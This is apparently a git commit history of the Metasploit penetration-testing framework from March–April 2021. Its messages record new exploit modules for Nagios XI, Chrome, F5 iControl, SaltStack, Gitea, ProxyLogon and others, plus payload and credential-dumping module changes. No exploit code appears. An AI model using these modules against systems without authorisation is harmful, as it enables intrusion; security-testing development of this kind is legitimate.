Compare commits

..

2719 Commits

Author SHA1 Message Date
Ashley Donaldson 80c3d82a94 Land #15051, automatically verify shell sessions 2021-04-22 13:32:25 +10:00
OJ cde95b9a11 Land #15080, add smash's details to mailmap 2021-04-22 11:06:29 +10:00
Ashley Donaldson 11983db498 Add smashery to mailmap 2021-04-22 10:37:03 +10:00
Metasploit 67631caeaa automatic module_metadata_base.json update 2021-04-21 15:36:22 -05:00
Grant Willcox 7dc1c19814 Land #15078, Update reverse_http.rb to fix a typo. 2021-04-21 15:25:30 -05:00
Grant Willcox a579e3f8df Land #15077 - Update reverse_https.rb to fix a typo 2021-04-21 15:22:01 -05:00
Nils Putnins faae3ff40e Update reverse_http.rb
Fixing a typo
2021-04-21 19:47:18 +03:00
Nils Putnins b6ed3f2752 Update reverse_https.rb
Fixing a typo
2021-04-21 19:46:44 +03:00
Grant Willcox 3a945d55a9 Land #15067, Guard SSH connection reset in lib/metasploit/framework/login_scanner/ssh.rb 2021-04-21 11:34:22 -05:00
Metasploit c79e6c6d6a automatic module_metadata_base.json update 2021-04-21 09:03:19 -05:00
Grant Willcox 634e88339d Land #15072, Remove is_root? check from linux_hashdump module and replace it with a check to see if the /etc/shadow file is readable by the current user. 2021-04-21 08:55:18 -05:00
Metasploit 4e8d92e199 automatic module_metadata_base.json update 2021-04-21 07:28:51 -05:00
agalway-r7 93c7727622 Land #15058, Cockpit CMS RCE 2021-04-21 13:21:55 +01:00
dwelch-r7 0c1a9ecd30 Land #15069, Replace third-party github labels app with standalone github actions 2021-04-21 10:56:42 +01:00
Alan Foster 8039babfad Replace third-party github labels app with standalone github actions 2021-04-21 10:13:08 +01:00
pingport80 f6cb88b642 remove is_root check from linux_hashdump 2021-04-21 10:19:30 +05:30
Metasploit 3028ab0a36 automatic module_metadata_base.json update 2021-04-20 18:27:04 -05:00
Grant Willcox b8b7db8355 Land PR #15070, Fix up wrong type field in nagios_xi_mibs_authenticated_rce.rb 2021-04-20 18:17:46 -05:00
Grant Willcox 7b7e521d6c Fix up a wrong type field value and set it back to 1 from 2 in the send_exploit() function, since this was causing the exploit to fail 2021-04-20 17:45:51 -05:00
Metasploit 106c66ebf3 automatic module_metadata_base.json update 2021-04-20 14:39:18 -05:00
Grant Willcox e0f13e44d1 Land #14699, Add Nagios XI snmptrap RCE and docs (CVE-2020-5792) 2021-04-20 14:30:45 -05:00
h00die e39b065e06 vprint to print 2021-04-20 15:26:47 -04:00
Grant Willcox 13d3e4ae89 Add in CentOS 7 with NagiosXI 5.6.5 scenario 2021-04-20 14:12:56 -05:00
Grant Willcox f241a050b8 Apply review comments and fixes to documentation and the module 2021-04-20 12:38:34 -05:00
Spencer McIntyre 69c525c2f7 Update the minimum WfsDelay setting
Now there's a minimum WfsDelay of 3 seconds with the user-configurable
value being added to it.
2021-04-20 13:05:37 -04:00
Metasploit 5d73217eb4 automatic module_metadata_base.json update 2021-04-20 11:11:54 -05:00
Tim W deaa241ca5 Land #15065, fix post/linux/gather/checkvm 2021-04-20 17:02:45 +01:00
pingport80 a4cfc3684e remove ls_pci_data initialization 2021-04-20 21:26:21 +05:30
pingport80 32bfa887da rubocop fixes 2021-04-20 21:23:24 +05:30
Metasploit 0aacaaab34 automatic module_metadata_base.json update 2021-04-20 10:49:20 -05:00
pingport80 43f4ec921d update docs and remove lscpu check 2021-04-20 21:12:27 +05:30
Grant Willcox fcdd47e8f5 Land #15064 - Fix Rex::Socket::SSHFactory NameError in exploit/linux/ssh/f5_bigip_known_privkey 2021-04-20 10:41:42 -05:00
pingport80 490e49acdb fix msftidy warning 2021-04-20 20:58:04 +05:30
pingport80 673084b65c remove sys/bus/xen check and add /sys/class/dmi/id/product_name check 2021-04-20 20:51:04 +05:30
Jeffrey Martin 2e99760298 guard ssh connection reset
When attempting a login a remote reset should not error the scanner.
2021-04-20 10:12:53 -05:00
pingport80 cde5c83517 add nil check and remove readable? 2021-04-20 18:44:38 +05:30
pingport80 61d4ab4e26 fix linux checkvm bug 2021-04-20 09:40:11 +05:30
Metasploit bac4ac4aab automatic module_metadata_base.json update 2021-04-19 19:06:25 -05:00
Grant Willcox 3b1512e113 Land #15063, Add fix to nagios_xi_plugins_check_ping_authenticated_rce.rb to ensure old versions can still be detected as being vulnerable 2021-04-19 18:53:14 -05:00
William Vu 8d71cfc024 Fix SSHFactory NameError in f5_bigip_known_privkey
This could probably be refactored to use Msf::Exploit::Remote::SSH.
2021-04-19 17:07:26 -05:00
Grant Willcox d60cdbebb3 Add in Regex fix to ensure that really old versions of NagiosXI will still be detected as vulnerable despite unusual version naming convention 2021-04-19 14:17:05 -05:00
h00die 51f9e1ae73 cockpit cms rce 2021-04-18 18:52:04 -04:00
Metasploit 6ecaeaf7d7 automatic module_metadata_base.json update 2021-04-16 14:46:06 -05:00
Grant Willcox 4ac9304ca2 Land #14968 - Add Nagios XI Mibs.php Authenticated RCE module and docs (CVE-2020-5791) 2021-04-16 14:37:15 -05:00
Grant Willcox 496e074ec8 Add in fixes to documentation and module from review 2021-04-16 13:14:17 -05:00
Metasploit 0b106b6d46 automatic module_metadata_base.json update 2021-04-16 11:34:29 -05:00
Grant Willcox bcbfb801b6 Land #15055, fix typos and documentation in chrome_simplifiedlowering_overflow 2021-04-16 11:25:35 -05:00
Grant Willcox d155702356 Add in Notes section to chrome_simplifiedlowering_overflow.rb 2021-04-16 11:02:52 -05:00
Tim c6464313d4 Update modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com>
2021-04-16 16:46:43 +01:00
cgranleese-r7 1745bda64a Land #15022, Ensure rpc service is warmed up before accepting requests 2021-04-16 16:27:20 +01:00
Tim W 97425602e9 fix typo and docs in chrome_simplifiedlowering_overflow 2021-04-16 14:59:43 +01:00
Metasploit e50450fbf5 automatic module_metadata_base.json update 2021-04-15 20:02:49 -05:00
Alan Foster 7fe97cfda2 Add health check functionality 2021-04-16 01:59:22 +01:00
Grant Willcox d4f7a6627e Land #15053, Move exploit/linux/http/citrix_dir_traversal_rce to exploit/freebsd/http/citrix_dir_traversal_rce 2021-04-15 19:53:53 -05:00
Alan Foster 4082ef23d6 Ensure meatsploit rpc service is warmed up 2021-04-16 01:39:19 +01:00
William Vu 9e6f425427 Move exploit/linux/http/citrix_dir_traversal_rce
To exploit/freebsd/http/citrix_dir_traversal_rce. It's actually FreeBSD.
2021-04-15 19:13:25 -05:00
Metasploit a098a36ead Bump version of framework to 6.0.41 2021-04-15 14:07:18 -05:00
Spencer McIntyre 66bc7a3800 Land #15047, Correct DNS PTR record crash 2021-04-15 12:30:00 -04:00
Grant Willcox 90f225ac25 Land #15049, Raise more descriptive Meterpreter related error messages 2021-04-15 11:02:50 -05:00
Spencer McIntyre 4978ad1f13 Be backwards compatible with the Windows Meterpreter
The older Windows Meterpreter had a bug where the core command IDs would
not be properly returned and added to the command array. Until the major
version of the payloads gem is bumped to ensure that all instances have
that change, skip validating Windows core command IDs. Any commands that
skip the proactive validation and fail, will continue to fail as they
did before.
2021-04-15 11:12:50 -04:00
Spencer McIntyre c886af2e6d Allow disabling shell session verification 2021-04-15 10:33:42 -04:00
Jeffrey Martin e50f015b5d Land #14996, hashcat logic fixes for crackers 2021-04-15 08:43:53 -05:00
Spencer McIntyre 99308d896b Refactor calling process_autoruns into the handler to be consistent 2021-04-15 09:07:12 -04:00
Spencer McIntyre ae7a5c7116 Automatically validate shell sessions too 2021-04-15 08:54:50 -04:00
cgranleese-r7 dbd0ac8203 Land #14985, Updates the JSON RPC Web service to correctly use framework's database configuration, and adds support for foregrounding the JSON RPC web service 2021-04-15 11:22:07 +01:00
Metasploit d744f65dbc automatic module_metadata_base.json update 2021-04-14 17:07:13 -05:00
Grant Willcox 832ca92f42 Land #14700, Add Nagios XI Plugins Filename Authenticate RCE module and docs (CVE-2020-35578) 2021-04-14 16:58:55 -05:00
Grant Willcox 61395f3cb1 Update scenarios in documentation and also update the module to handle cases where the version number may not be in a format that Rex::Text can immediately handle. 2021-04-14 16:32:53 -05:00
Grant Willcox 76353efada Fix minor RuboCop error 2021-04-14 15:38:06 -05:00
Grant Willcox 154e237edd Add in fixes to documentation and module that were covered in the review process 2021-04-14 15:33:42 -05:00
Tim W 364cb13362 Land #15043, fix python reverse_http payload when luri does not begin with a slash 2021-04-14 17:49:14 +01:00
Spencer McIntyre f941ccaf1c Raise more descriptive meterpreter related error messages 2021-04-14 12:42:33 -04:00
cgranleese-r7 b892f311d5 Land #15034, Fix broken association handling for remote msfdb services command 2021-04-14 16:27:55 +01:00
ryananicholson d20285b507 Correct DNS PTR record crash
When using `auxiliary/gather/enum_dns` and setting `NS` to an internal system, the following crash occurs (which is fixed with this PR):
```
[-] Auxiliary failed: NoMethodError undefined method `ptr' for #<Dnsruby::RR::IN::PTR:0x00007f8b9e9cb450>
```
2021-04-14 09:58:50 -04:00
Metasploit 9a36cd16d7 automatic module_metadata_base.json update 2021-04-14 05:41:16 -05:00
adfoster-r7 4c37e35d82 Land #14770, guard when spawn is used with TcpServer mixin 2021-04-14 11:34:25 +01:00
Metasploit 970c9ab196 automatic module_metadata_base.json update 2021-04-14 05:18:14 -05:00
adfoster-r7 ddde7ebb71 Land #15037, Update redis_login to check that authentication is required 2021-04-14 11:11:00 +01:00
Justin Steven 821fd177bb Fix Python HTTP stage when LURI is mis-slashed 2021-04-14 12:28:18 +10:00
Metasploit b39d200fe8 automatic module_metadata_base.json update 2021-04-13 19:06:12 -05:00
Grant Willcox a59e7e196d Land #14701, Rename Nagios XI authenticated RCE module and integrate Nagios XI mixin 2021-04-13 18:58:29 -05:00
Grant Willcox 9379f0356b Add in 5.6.5 exploitation scenario to documentation 2021-04-13 17:42:47 -05:00
Grant Willcox d766cf9b96 Change module title to be more descriptive and remove bad characters 2021-04-13 17:33:34 -05:00
Grant Willcox 0aada27128 Update the documentation to account for the fact that the plugin name has to be check_ping and also update the module to randomize some of the fields where possible. 2021-04-13 17:15:34 -05:00
Grant Willcox cdd589f592 Update documentation to wrap some overly long lines to meet msftidy_docs.rb requirements. 2021-04-13 16:36:38 -05:00
Grant Willcox ead9d73dc5 Add in fixes from review to documentation and module 2021-04-13 16:34:13 -05:00
Metasploit 98ffe35d1a automatic module_metadata_base.json update 2021-04-13 10:29:51 -05:00
Grant Willcox 552c0e7cea Land #15028, payloads/singles/linux/x64/exec.rb refactoring, metasm, and new NullFreeVersion option 2021-04-13 10:21:11 -05:00
Alan Foster 6d0aed92bc Fix broken association handling for msfdb services command 2021-04-13 15:01:09 +01:00
Metasploit 4c8112a4de automatic module_metadata_base.json update 2021-04-13 08:05:26 -05:00
Spencer McIntyre 17700a3a9b Land #15035, update metasploit-payloads gem to v2.0.43 2021-04-13 08:56:51 -04:00
Spencer McIntyre 0bc6b32728 Land #15038, Fix Gem::Package NameError with Rex::Tar::Writer (exploit/linux/http/pulse_secure_gzip_rce) 2021-04-13 08:51:24 -04:00
Spencer McIntyre 20f4050e5b Update redis_login to check that authentication is required 2021-04-12 19:53:01 -04:00
William Vu e842c3ecab Fix Gem::Package NameError with Rex::Tar::Writer 2021-04-12 18:50:31 -05:00
Grant Willcox fb9aa68b7a Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00
Metasploit 14cba26102 automatic module_metadata_base.json update 2021-04-12 16:28:01 -05:00
Grant Willcox e2532ab01b Land #14994, Update session_spy.rb to have a PID option for session migration. 2021-04-12 16:18:26 -05:00
Tim W bd6c211723 update metasploit-payloads gem to v2.0.43 2021-04-12 21:40:49 +01:00
Spencer McIntyre c4f88e35ba Land #14622, add the sp_oacreate technique to the mssql_exec module 2021-04-12 15:00:15 -04:00
Grant Willcox 9e43a34599 Add in scenario to documentation for when database is connected and loot is being stored. 2021-04-12 13:52:41 -05:00
Spencer McIntyre ef82219235 Update the mssql_exec docs and some verbiage 2021-04-12 14:52:13 -04:00
Grant Willcox 045367cff7 Apply RuboCop formatting to documentation and module 2021-04-12 13:52:00 -05:00
Grant Willcox 54aa9d42e9 Add one additional guard clause in to prevent outputting a message if the database isn't properly connected 2021-04-12 13:41:17 -05:00
Grant Willcox 0b06904dd0 Update module with more checks and replace the Process migration strategy with a PID migration strategy. Also update documentation accordingly 2021-04-12 13:05:26 -05:00
archcloudlabs 7a828b5884 updating w/ proc option to migrate into and proc check before auto migrate 2021-04-12 13:05:26 -05:00
Paul Werther 7a07146d03 add ref for xp_cmdshell 2021-04-11 22:18:44 +02:00
Paul Werther 75aba6707b modify original module, add technique option 2021-04-11 22:16:15 +02:00
Geyslan G. Bem 6f5c82c388 payloads/x64: exec.rb new behaviour
This patch adds new behaviour to CMD option.

Now if CMD is empty or unset, a 21 byte not null-free execve payload is built.
The arbitrary command option continues the same when CMD is set.

It also adds the OptBool NullFreeVersion advanced option.

Its default value is false. When set as true, generate will output a
self included null-free version of the payload without need of encoding.

Signed-off-by: Geyslan G. Bem <geyslan@gmail.com>
2021-04-10 00:55:44 -03:00
Geyslan G. Bem 8e0d6d2675 payloads/x64: exec.rb metasm, refactoring
This patch converts shellcode to metasm and make it more efficient, resulting
in its size being reduced to 37 bytes + CMD length.

Signed-off-by: Geyslan G. Bem <geyslan@gmail.com>
2021-04-09 21:50:18 -03:00
Metasploit aaf27d7fa5 automatic module_metadata_base.json update 2021-04-09 16:38:25 -05:00
Grant Willcox 64dcf49311 Land #15017, Update tomcat ghost module with default ports 2021-04-09 16:30:23 -05:00
Grant Willcox 7c23f7f546 Fix a minor issue where one command wasn't properly documented in a manner that allowed for easy copy and pasting 2021-04-09 16:29:24 -05:00
Grant Willcox 608ac3a0b7 Update module description to clean it up and also add documentation for uncommon options 2021-04-09 16:09:02 -05:00
Metasploit 0f55307abd automatic module_metadata_base.json update 2021-04-09 12:41:58 -05:00
Grant Willcox 0588672415 Land #15020, Update mettle payloads to 1.0.9 2021-04-09 12:33:32 -05:00
Metasploit d19b32881d automatic module_metadata_base.json update 2021-04-09 11:14:40 -05:00
Grant Willcox 2f6cb9b707 Land #14997, x64/shell_bind_tcp_random_port: rip one byte off 2021-04-09 11:06:58 -05:00
Metasploit 9d70e52587 automatic module_metadata_base.json update 2021-04-09 06:32:02 -05:00
Christophe De La Fuente e48ebe6659 Update haserl_read module documentation (again)
- Add CVE and Ref.
- Add fixed version
2021-04-09 13:24:49 +02:00
Metasploit 6ac4d60feb automatic module_metadata_base.json update 2021-04-09 06:17:02 -05:00
Alan Foster c7635296a1 Update mettle payloads to 1.0.9 2021-04-09 12:09:47 +01:00
Christophe De La Fuente 586d033909 Land #14833, haserl-based exploit for Alpine linux 2021-04-09 13:07:47 +02:00
Christophe De La Fuente a2d6ba4b59 Update haserl_read module documentation 2021-04-09 13:04:16 +02:00
Metasploit 9d75203695 automatic module_metadata_base.json update 2021-04-08 16:25:19 -05:00
Tim W 7c575cd38f Land #15007, add a chrome renderer exploit (CVE-2020-16040) 2021-04-08 22:18:20 +01:00
rajvardhan agarwal 15a72ec2f9 Merge pull request #1 from timwr/fix-15007
Some potential improvements for chrome_simplifiedlowering_integer_overflow
2021-04-09 02:37:08 +05:30
Tim W 53b739277a do location.reload() if exploit fails 2021-04-08 21:21:06 +01:00
Tim W 8019eda667 fix 0x2000 shellcode limit 2021-04-08 21:17:40 +01:00
Tim W bd32f686bc remove dataview allocation 2021-04-08 21:17:01 +01:00
Tim W 6b86f6c881 remove 0x150 shellcode limit 2021-04-08 21:06:15 +01:00
Tim W c12f098c45 cosmetic fixes 2021-04-08 20:54:54 +01:00
h00die 58a9dd6265 use local variable to avoid shells 2021-04-08 14:02:24 -04:00
Metasploit 0a23f19333 Bump version of framework to 6.0.40 2021-04-08 12:09:50 -05:00
Alan Foster 8814218f20 Update tomcat ghost module with default ports 2021-04-08 10:29:09 +01:00
Metasploit de51734fcc automatic module_metadata_base.json update 2021-04-07 13:51:53 -05:00
Shelby Pace 926f051377 Land #14978, add Gitea and Gogs exploit modules 2021-04-07 13:44:43 -05:00
adfoster-r7 d65fc926f0 Land #14873, handle modules failing to be created when checking compatibility 2021-04-07 19:39:13 +01:00
Christophe De La Fuente 1dfdb619a9 Update from code review
- Set RPORT default value to 3000
- Use ternary operator
2021-04-07 19:40:59 +02:00
Metasploit cf6b08d15b automatic module_metadata_base.json update 2021-04-07 07:36:02 -05:00
cgranleese-r7 893de0c45c Land #14987, Update RbMysql to the most recent version 2021-04-07 13:29:43 +01:00
adfoster-r7 26899ff013 Land #14992, updates auto_target_host guard clause to additionally handle rhost being nil 2021-04-07 10:19:20 +01:00
Metasploit dad3188ade automatic module_metadata_base.json update 2021-04-07 04:17:36 -05:00
adfoster-r7 258b9d3e28 Land #14998, Change CVE references from CVE Details to NVD 2021-04-07 10:10:55 +01:00
Metasploit c80038b216 automatic module_metadata_base.json update 2021-04-07 02:56:28 -05:00
Christophe De La Fuente 6a5529c7cc Land #14965, Solman post module for CVE-2019-0307 and new action for cve_2020_6207_solman_rce auxiliary module 2021-04-07 09:46:56 +02:00
Vladimir Ivanov 690e687e7e Updates from code review
Update modules/post/multi/sap/smdagent_get_properties.rb
Update modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
Update documentation for auxiliary module cve_2020_6207_solman_rce.md
Update documentation for post module smdagent_get_properties.md
Move setup_xml_and_variables to `run` method in auxiliary module cve_2020_6207_solman_rce.rb
Delete list_dir, read_file, file_exist in post module smdagent_get_properties.rb
2021-04-06 21:23:39 +02:00
Metasploit a9d5ea6ba3 automatic module_metadata_base.json update 2021-04-06 13:24:09 -05:00
adfoster-r7 6ce60cf634 Land #15006, fix ntp regression 2021-04-06 19:17:42 +01:00
adfoster-r7 4239c33143 Land #15008, Pin metasploit gems in preparation for rails 6 2021-04-06 17:41:26 +01:00
dwelch-r7 c267a7fc2d Fix issue with Rex::Proto::NTP namespacing 2021-04-06 14:45:11 +01:00
rajvardhan agarwal b1c5afc55b fix rubocop warning 2021-04-06 18:46:07 +05:30
rajvardhan agarwal c23a69dcaf Make suggested changes 2021-04-06 18:43:26 +05:30
Alan Foster 26203ebe6b Pin metasploit gems in preparation for rails 6 2021-04-06 13:34:20 +01:00
rajvardhan agarwal 1088557ce9 fix rubocop warning 2021-04-06 17:51:23 +05:30
rajvardhan agarwal cb0319c849 fix rubocop warning 2021-04-06 17:41:05 +05:30
rajvardhan agarwal c863c324ae Add exploit for CVE-2020-16040 2021-04-06 17:25:27 +05:30
Metasploit 84176504d6 automatic module_metadata_base.json update 2021-04-06 06:12:33 -05:00
dwelch-r7 aa3bc792b7 Land #14991, Fix crash in ntp protocol fuzzer 2021-04-06 12:06:09 +01:00
William Vu 4020813b42 Correct broken or redundant CVE references 2021-04-05 13:06:50 -05:00
Metasploit 7c86846032 automatic module_metadata_base.json update 2021-04-05 11:51:54 -05:00
Shelby Pace cfc6b0a8ba Land #14971, add Apache OFBiz SOAP Deser rce 2021-04-05 11:44:40 -05:00
Shelby Pace a803e1e932 remove spare comma 2021-04-05 09:33:20 -05:00
William Vu 22ae40a072 Remove new AKB reference
I'm not sure it adds enough value due to the URL format.
2021-04-03 14:05:45 -05:00
William Vu d020b2fb5f Update f5_icontrol_rest_ssrf_rce for AKB reference 2021-04-03 12:58:42 -05:00
William Vu 48f743a9f2 Change CVE reference to NVD and add AKB reference 2021-04-03 12:56:26 -05:00
Geyslan G. Bem 74a77fb66e x64/shell_bind_tcp_random_port: rip one byte off
Gets rid of one more byte and adjusts mentions to //bin/sh string.

Signed-off-by: Geyslan G. Bem <geyslan@gmail.com>
2021-04-03 12:04:32 -03:00
h00die 049813cfe9 hashcat logic fixes 2021-04-03 08:32:41 -04:00
Metasploit 8726c01e12 automatic module_metadata_base.json update 2021-04-02 10:33:33 -05:00
Christophe De La Fuente 401a4ff8c7 Land #14975, Fix uninitialized constant in cve_2020_1054_drawiconex_lpe 2021-04-02 17:23:03 +02:00
Jeffrey Martin a9b3c15601 guard host search on rhost set
During module instantiation auto_target process is expected to account
for existing hosts if `rhost` is set, however just testing if the module
responds to `rhost` is not sufficent to guard the query, a value must also
have been set.
2021-04-02 08:47:32 -05:00
jvoisin 943698ef19 Add an haserl-based exploit for Alpine linux 2021-04-02 13:43:52 +02:00
Alan Foster 12c5dd6f44 Fix db connection support for rpc service 2021-04-02 05:30:34 +01:00
Jeffrey Martin 97a1871715 Land #14988, fix rails 5 bug for password cracker custom_wordlists 2021-04-01 16:01:23 -05:00
Jinny 3ce4e5ec2c Updated calls to describe method to fix crashes 2021-04-01 22:06:40 +02:00
Metasploit 96b2b6888b automatic module_metadata_base.json update 2021-04-01 13:13:33 -05:00
Shelby Pace 71914a1ddb Land #14813, additional dup scout bof targets 2021-04-01 13:03:57 -05:00
h00die a8da6aedd9 fix rails 5 bug for wordlist 2021-04-01 13:49:21 -04:00
kalba-security 34a5f7906c Rebase so we can use the latest mixin code,update the version range, update docs 2021-04-01 13:29:44 -04:00
kalba-security faab100d9a Add Nagios XI Mibs.php Authenticated RCE module and docs 2021-04-01 13:06:33 -04:00
Metasploit 93f36f8f7a Bump version of framework to 6.0.39 2021-04-01 12:04:32 -05:00
kalba-security f76f58eb51 Rebase, use latest mixin code in check, update version and docs 2021-04-01 12:43:44 -04:00
kalba-security dd5c747584 Add Nagios XI snmptrap RCE and docs 2021-04-01 12:26:06 -04:00
kalba-security 02b9e5c939 rebase, use latest mixin code, correct vulnerable versions, update docs 2021-04-01 12:18:46 -04:00
kalba-security 3b7e612541 Add Nagios XI Plugins Filename Authenticate RCE module and docs 2021-04-01 11:23:52 -04:00
kalba-security 2df90d8d23 Rebase, rename module to nagios_xi_plugins_check_plugin_authenticated_rce, update check to take advantage of mixin, minor improvements 2021-04-01 11:07:49 -04:00
dwelch-r7 98df005c6c Fix test 2021-04-01 15:57:28 +01:00
Metasploit 6021fcf847 automatic module_metadata_base.json update 2021-04-01 08:47:57 -05:00
Shelby Pace 2cbd1a6be9 Land #14935, add F5 iControl REST API SSRF RCE 2021-04-01 08:40:38 -05:00
kalba-security a02f14f644 Add 'moved_from' alias 2021-04-01 09:26:24 -04:00
kalba-security 0e7c11ada3 Rename module and modify it to use the Nagios XI mixin, add autocheck, fix syntax and linting, also update docs 2021-04-01 09:26:16 -04:00
dwelch-r7 278c56652e Update RbMysql to the most recent code from this gem https://github.com/tmtm/ruby-mysql 2021-04-01 14:17:28 +01:00
Metasploit 6549c12473 automatic module_metadata_base.json update 2021-03-31 14:58:01 -05:00
Shelby Pace 8cdaf9791d Land #14950, add saltstack salt api rce 2021-03-31 14:50:30 -05:00
Shelby Pace 9eacda5552 add wait time line to test output 2021-03-31 14:47:34 -05:00
William Vu 69a0c9420b Add module doc 2021-03-31 14:02:32 -05:00
William Vu cb3f1238f3 Add F5 iControl REST CVE-2021-22986 exploit 2021-03-31 14:02:32 -05:00
Tim W 3ed978a6e7 Land #14979, bump metasploit-payloads gem to v2.0.41 2021-03-31 19:26:35 +01:00
Metasploit 6c5503b054 automatic module_metadata_base.json update 2021-03-31 13:18:54 -05:00
William Vu 7073d3c6ea Land #14980, CmdStagerFlavor fixes for two modules 2021-03-31 13:02:37 -05:00
Shelby Pace fa805cc814 bump metasploit-payloads gem to v2.0.41 2021-03-31 12:20:12 -05:00
William Vu 51200c4b22 Remove CmdStagerFlavor from a couple modules
Not strictly necessary. We need a better way to limit by platform.
2021-03-31 12:08:46 -05:00
Christophe De La Fuente 9806026ab9 Update from code review 2021-03-31 17:48:35 +02:00
Christophe De La Fuente 73a8b7aa5f Add Gitea and Gogs RCE modules and documentations 2021-03-31 16:47:29 +02:00
Spencer McIntyre d73ec7a751 Remove the CmdStager allow list and randomize the domain 2021-03-31 08:54:37 -04:00
Tim W 70c8e802d8 Fix #14974, fix uninitialized constant in cve_2020_1054_drawiconex_lpe 2021-03-31 12:06:15 +01:00
William Vu ec37a88a4a Land #14972, vmware_vcenter_uploadova_rce docs++ 2021-03-30 21:32:57 -05:00
William Vu 151b8f2f92 Update vmware_vcenter_uploadova_rce module doc 2021-03-30 21:08:21 -05:00
Spencer McIntyre b88734d8cb Convert symbol data store options to strings for condition checks 2021-03-30 18:19:09 -04:00
Spencer McIntyre a0a4bc079a Add the exploit module for CVE-2021-26295 2021-03-30 18:18:16 -04:00
Spencer McIntyre fb8527141b Land #14969, Update metasploit-payloads gem to 2.0.40 2021-03-30 14:12:46 -04:00
adfoster-r7 838cf3afe8 Land #14937, Improves performance of show command 2021-03-30 18:20:08 +01:00
Tim W e077b50a7e Update metasploit-payloads gem to 2.0.40 2021-03-30 17:46:57 +01:00
cgranleese-r7 9485834219 Corrects the count, so tables will start at zero
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2021-03-30 17:42:09 +01:00
Metasploit c0a9d4fa35 automatic module_metadata_base.json update 2021-03-30 11:24:16 -05:00
Spencer McIntyre 3340593938 Land #14951, Update metasploit_payloads-mettle gem to 1.0.8 2021-03-30 12:16:17 -04:00
Metasploit bb01c43231 automatic module_metadata_base.json update 2021-03-30 10:48:58 -05:00
Spencer McIntyre 3672a3fcc8 Land #14966, Fix Exchange ProxyLogon RCE triggering payload twice 2021-03-30 11:42:14 -04:00
adfoster-r7 fe61d92ac1 Land #14962,Fixes nexpose_connect login failure when user or password contains an @ symbol 2021-03-30 15:52:27 +01:00
ryanpohlner d92d0e59d8 Fixed generic cmd payload not echoing 2021-03-29 20:06:12 -04:00
ryanpohlner c55303863a Fixed payload triggering twice 2021-03-29 18:27:25 -04:00
Vladimir Ivanov 1f4046c45f Update references and delete check_addr in post module smdagent_get_properties.rb 2021-03-29 22:58:48 +03:00
Metasploit 54b4a50365 automatic module_metadata_base.json update 2021-03-29 13:45:07 -05:00
adfoster-r7 4f960d76b1 Land #14918, RangeWalker Updates For Better Hostname Handling 2021-03-29 19:38:49 +01:00
Ivanov Vladimir eeed98d93e CVE-2019-0307
Add documentation for post module smdagent_get_properties.md
Update documentation for auxiliary module cve_2020_6207_solman_rce.md
2021-03-29 21:11:16 +03:00
Spencer McIntyre 2e7d933167 Bump the rex-sockets gem again to pull in the latest 'n greatest 2021-03-29 13:56:25 -04:00
Spencer McIntyre 48e120d4e9 Fix a bug from a missed reference and update the rex-socket gem 2021-03-29 13:56:25 -04:00
Spencer McIntyre 8d579ff30c Update the HTTP Title scanner as a demonstration 2021-03-29 13:56:25 -04:00
Spencer McIntyre 35106f7b99 Wire in the new RangeWalker improvements 2021-03-29 13:56:25 -04:00
Ivanov Vladimir a803d7a0d1 CVE-2019-0307
Add post module smdagent_get_properties.rb
Add lib sap_smd_agent_unencrypted_property.rb
Update auxiliary module cve_2020_6207_solman_rce.rb
Update lib sap_sol_man_eem_miss_auth.rb
2021-03-29 20:29:30 +03:00
Metasploit 22baaa59fa automatic module_metadata_base.json update 2021-03-29 11:11:36 -05:00
Spencer McIntyre 9d85af51cb Land #14945, Proxylogon RCE (Praetorian update) 2021-03-29 12:04:19 -04:00
cgranleese-r7 4b8cdba8e6 Fixes nexpose_connect login failure when user or password contains @ 2021-03-29 16:20:48 +01:00
Metasploit 2cd74fd2c6 automatic module_metadata_base.json update 2021-03-29 09:19:44 -05:00
adfoster-r7 4bf5f4a49c Land #14963, Fix cloud_lookup gather module (PublicSuffix) 2021-03-29 15:12:20 +01:00
Spencer McIntyre 11f4946817 Tweak some ProxyLogon verbiage for clarity 2021-03-29 10:07:43 -04:00
RAMELLA Sébastien e09c62a8c2 fix. missing require 2021-03-29 15:56:46 +04:00
RAMELLA Sébastien 02b240b22a code review 2021-03-29 14:23:39 +04:00
Christophe De La Fuente fca8bf37e2 Update description & add Stability trait 2021-03-29 11:14:35 +02:00
Metasploit 7020b983cf automatic module_metadata_base.json update 2021-03-26 18:19:21 -05:00
Grant Willcox 80ae750df5 Land #14697, Add Nagios XI mixin and auxiliary scanner module and docs 2021-03-26 18:12:16 -05:00
Metasploit 4e2f2fe22e automatic module_metadata_base.json update 2021-03-26 15:15:25 -05:00
bwatters 11b12e4c63 Land #14869, Add Windows post module for gathering Exchange mailboxes
Merge branch 'land-14869' into upstream-master
2021-03-26 15:08:06 -05:00
kalba-security 514f97f4fe Fix bug in nagios_xi_version regex 2021-03-26 14:18:25 -04:00
kalba-security 83e31aeaa4 Use safe navigation operator for get_nsp regex 2021-03-26 13:44:17 -04:00
Grant Willcox 9039b5687f Fix up version regex and also fix a description to be a little more accurate 2021-03-26 11:57:03 -05:00
Grant Willcox 1dbf1656d3 Update to introduce wrapping on some comments and also to fix up the CVE output a bit 2021-03-26 11:46:51 -05:00
Tim W c05ed60dd8 update payloads cached size 2021-03-26 15:25:35 +00:00
Tim W 1dd048b5ac Update metasploit_payloads-mettle gem to 1.0.8 2021-03-26 15:23:39 +00:00
cgranleese-r7 975e41d521 Adds a new method to use metadata cache for show command 2021-03-26 15:08:29 +00:00
Christophe De La Fuente 00698d20bf Add waiting status message and update doc 2021-03-26 14:59:27 +01:00
Christophe De La Fuente b069fec866 Add module and doc for Saltstack Salt API wheel_async RCE 2021-03-26 13:54:06 +01:00
RAMELLA Sébastien c64b1b200e remove ClientID, seem useless 2021-03-26 16:37:08 +04:00
Metasploit 27f9872a7d automatic module_metadata_base.json update 2021-03-26 02:00:53 -05:00
William Vu fb387d940d Land #14946, fail_with corrections for two modules 2021-03-26 01:51:14 -05:00
William Vu b517372e4d Fix sharepoint_ssi_viewstate, too 2021-03-26 01:32:46 -05:00
William Vu a6df15c8c2 Fix the rest of the optional method 2021-03-26 01:29:47 -05:00
sophosyaniv 87580c1340 randomize output delimiters 2021-03-25 20:15:34 -07:00
sophosyaniv d74fe1d6d8 randomize output delimiters 2021-03-25 20:12:58 -07:00
Metasploit 73d51f0ff6 automatic module_metadata_base.json update 2021-03-25 16:56:17 -05:00
